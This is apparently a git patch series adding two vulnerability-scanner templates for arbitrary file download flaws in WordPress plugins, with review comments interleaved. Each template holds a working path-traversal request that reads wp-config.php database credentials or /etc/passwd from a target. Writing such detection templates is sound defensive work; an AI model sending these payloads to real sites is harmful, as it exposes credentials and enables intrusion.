From 15acac63541343db4df05a974c4b36bfcb0fa797 Mon Sep 17 00:00:00 2001
From: Roberto Nunes <46332131+Akokonunes@users.noreply.github.com>
Date: Thu, 14 Oct 2021 08:58:10 +0900
Subject: [PATCH 1/6] Create aspose-words-exporter-file-download.yaml

---
 aspose-words-exporter-file-download.yaml | 26 ++++++++++++++++++++++++
 1 file changed, 26 insertions(+)
 create mode 100644 aspose-words-exporter-file-download.yaml

diff --git a/aspose-words-exporter-file-download.yaml b/aspose-words-exporter-file-download.yaml
new file mode 100644
index 0000000000..f75904a727
--- /dev/null
+++ b/aspose-words-exporter-file-download.yaml
@@ -0,0 +1,26 @@
+id: aspose-words-exporter-file-download
+
+info:
+ name: Aspose Words Exporter < 2.0 - Unauthenticated Arbitrary File Download
+ author: 0x_Akoko
+ severity: high
+ tags: wordpress,wp-plugin,lfi,wp
+ reference: https://wpscan.com/vulnerability/7869
+
+requests:
+ - method: GET
+ path:
+ - '{{BaseURL}}/wp-content/plugins/aspose-doc-exporter/aspose_doc_exporter_download.php?file=../../../wp-config.php'
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - "DB_NAME"
+ - "DB_PASSWORD"
+ part: body
+ condition: and
+
+ - type: status
+ status:
+ - 200

From 02d00716604fa8f15ff499255192633dd6175f01 Mon Sep 17 00:00:00 2001
From: Prince Chaddha
Date: Thu, 14 Oct 2021 16:33:38 +0530
Subject: [PATCH 2/6] Update and rename aspose-words-exporter-file-download.yaml to vulnerabilities/wordpress/aspose-words-file-download.yaml

---
 .../wordpress/aspose-words-file-download.yaml | 9 ++++++---
 1 file changed, 6 insertions(+), 3 deletions(-)
 rename aspose-words-exporter-file-download.yaml => vulnerabilities/wordpress/aspose-words-file-download.yaml (62%)

diff --git a/aspose-words-exporter-file-download.yaml b/vulnerabilities/wordpress/aspose-words-file-download.yaml
similarity index 62%
rename from aspose-words-exporter-file-download.yaml
rename to vulnerabilities/wordpress/aspose-words-file-download.yaml
index f75904a727..6cf04ee7eb 100644
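Review bot: In aspose-words-exporter-file-download.yaml (PATCH 1/6) the word matcher accepts any 200 response whose body contains the bare strings `DB_NAME` and `DB_PASSWORD`, so a page that merely mentions those constants (documentation, a debug or error page) would be reported as a confirmed file disclosure. Tying the match to the PHP definition is stricter, for example a `regex` matcher on `define\(\s*['"]DB_PASSWORD['"]` with `part: body`. Because a true positive returns the contents of wp-config.php, the template also deserves a comment above `requests:` such as `# response body contains database credentials; treat scan output as sensitive`.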
--- a/aspose-words-exporter-file-download.yaml
+++ b/vulnerabilities/wordpress/aspose-words-file-download.yaml
@@ -1,11 +1,14 @@
-id: aspose-words-exporter-file-download
+id: aspose-words-file-download

 info:
 name: Aspose Words Exporter < 2.0 - Unauthenticated Arbitrary File Download
 author: 0x_Akoko
 severity: high
- tags: wordpress,wp-plugin,lfi,wp
- reference: https://wpscan.com/vulnerability/7869
+ description: The Aspose.Words Exporter WordPress plugin is affected by an Arbitrary File Download security vulnerability.
+ reference:
+ - https://wpscan.com/vulnerability/7869
+ - https://wordpress.org/plugins/aspose-doc-exporter
+ tags: wordpress,wp-plugin,lfi

 requests:
 - method: GET

From 718f49c6678725fab82d741040e75655a84cd6bb Mon Sep 17 00:00:00 2001
From: Roberto Nunes <46332131+Akokonunes@users.noreply.github.com>
Date: Sat, 16 Oct 2021 18:44:32 +0900
Subject: [PATCH 3/6] Create CVE-2015-4694.yaml

---
 CVE-2015-4694.yaml | 24 ++++++++++++++++++++++++
 1 file changed, 24 insertions(+)
 create mode 100644 CVE-2015-4694.yaml

diff --git a/CVE-2015-4694.yaml b/CVE-2015-4694.yaml
new file mode 100644
index 0000000000..e17313f7e9
--- /dev/null
+++ b/CVE-2015-4694.yaml
@@ -0,0 +1,24 @@
+id: CVE-2015-4694
+
+info:
+ name: Zip Attachments <= 1.1.4 - Arbitrary File Download
+ author: 0x_Akoko
+ severity: high
+ tags: lfi,wordpress,wp,cve
+ reference: https://wpscan.com/vulnerability/8047
+
+requests:
+ - method: GET
+ path:
+ - '{{BaseURL}}/wp-content/plugins/zip-attachments/download.php?za_file=../../../../../etc/passwd&za_filename=passwd'
+
+ matchers-condition: and
+ matchers:
+
+ - type: regex
+ regex:
+ - "root:[x*]:0:0"
+
+ - type: status
+ status:
+ - 200

From d461c1f77cc764ebcfee7637a7bf1b518f73bf10 Mon Sep 17 00:00:00 2001
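Review bot: In CVE-2015-4694.yaml (PATCH 3/6) the regex matcher has no `part:` key, while the word matcher in aspose-words-exporter-file-download.yaml states `part: body`; adding `part: body` under the regex matcher keeps the two templates consistent and makes the matched part explicit rather than relying on the engine default. The blank line directly after `matchers:` is a stray difference from the sibling template and can be dropped. The check can only confirm the issue on hosts that expose a Unix-style /etc/passwd, which is worth stating in a comment above the matcher, e.g. `# confirms only on Unix-like hosts; no match does not prove the plugin is patched`.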
From: Prince Chaddha
Date: Sun, 17 Oct 2021 08:01:28 +0530
Subject: [PATCH 4/6] Update and rename CVE-2015-4694.yaml to cves/2015/CVE-2015-4694.yaml

---
 CVE-2015-4694.yaml => cves/2015/CVE-2015-4694.yaml | 3 ++-
 1 file changed, 2 insertions(+), 1 deletion(-)
 rename CVE-2015-4694.yaml => cves/2015/CVE-2015-4694.yaml (72%)

diff --git a/CVE-2015-4694.yaml b/cves/2015/CVE-2015-4694.yaml
similarity index 72%
rename from CVE-2015-4694.yaml
rename to cves/2015/CVE-2015-4694.yaml
index e17313f7e9..6b81b9705d 100644
--- a/CVE-2015-4694.yaml
+++ b/cves/2015/CVE-2015-4694.yaml
@@ -4,8 +4,9 @@ info:
 name: Zip Attachments <= 1.1.4 - Arbitrary File Download
 author: 0x_Akoko
 severity: high
- tags: lfi,wordpress,wp,cve
+ description: The zip-attachments plugin allows arbitrary file downloads because it does not check the download path of the requested file.
 reference: https://wpscan.com/vulnerability/8047
+ tags: lfi,wordpress,cve,cve2015,wp-plugin

 requests:
 - method: GET

From 39ab764bfa0618b4f87458f4ecf9ee473de65c80 Mon Sep 17 00:00:00 2001
From: Prince Chaddha
Date: Sun, 17 Oct 2021 08:03:02 +0530
Subject: [PATCH 5/6] Update CVE-2015-4694.yaml

---
 cves/2015/CVE-2015-4694.yaml | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/cves/2015/CVE-2015-4694.yaml b/cves/2015/CVE-2015-4694.yaml
index 6b81b9705d..c273f16a80 100644
--- a/cves/2015/CVE-2015-4694.yaml
+++ b/cves/2015/CVE-2015-4694.yaml
@@ -4,7 +4,7 @@ info:
 name: Zip Attachments <= 1.1.4 - Arbitrary File Download
 author: 0x_Akoko
 severity: high
- description: The zip-attachments plugin allows arbitrary file downloads because it does not check the download path of the requested file.
+ description: The zip-attachments plugin allows arbitrary file downloads because it does not check the download path of the requested file.
 reference: https://wpscan.com/vulnerability/8047
 tags: lfi,wordpress,cve,cve2015,wp-plugin


From dfc4a64fdcb13fc41e790c52aa63b9c88df4c16d Mon Sep 17 00:00:00 2001
From: GitHub Action
Date: Sun, 17 Oct 2021 11:26:16 +0000
Subject: [PATCH 6/6] Auto Generated CVE annotations [Sun Oct 17 11:26:16 UTC 2021] :robot:

---
 cves/2015/CVE-2015-4694.yaml | 5 +++++
 1 file changed, 5 insertions(+)

diff --git a/cves/2015/CVE-2015-4694.yaml b/cves/2015/CVE-2015-4694.yaml
index c273f16a80..97b8256f1d 100644
--- a/cves/2015/CVE-2015-4694.yaml
+++ b/cves/2015/CVE-2015-4694.yaml
@@ -7,6 +7,11 @@ info:
 description: The zip-attachments plugin allows arbitrary file downloads because it does not check the download path of the requested file.
 reference: https://wpscan.com/vulnerability/8047
 tags: lfi,wordpress,cve,cve2015,wp-plugin
+ classification:
+ cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
+ cvss-score: 8.60
+ cve-id: CVE-2015-4694
+ cwe-id: CWE-22

 requests:
 - method: GET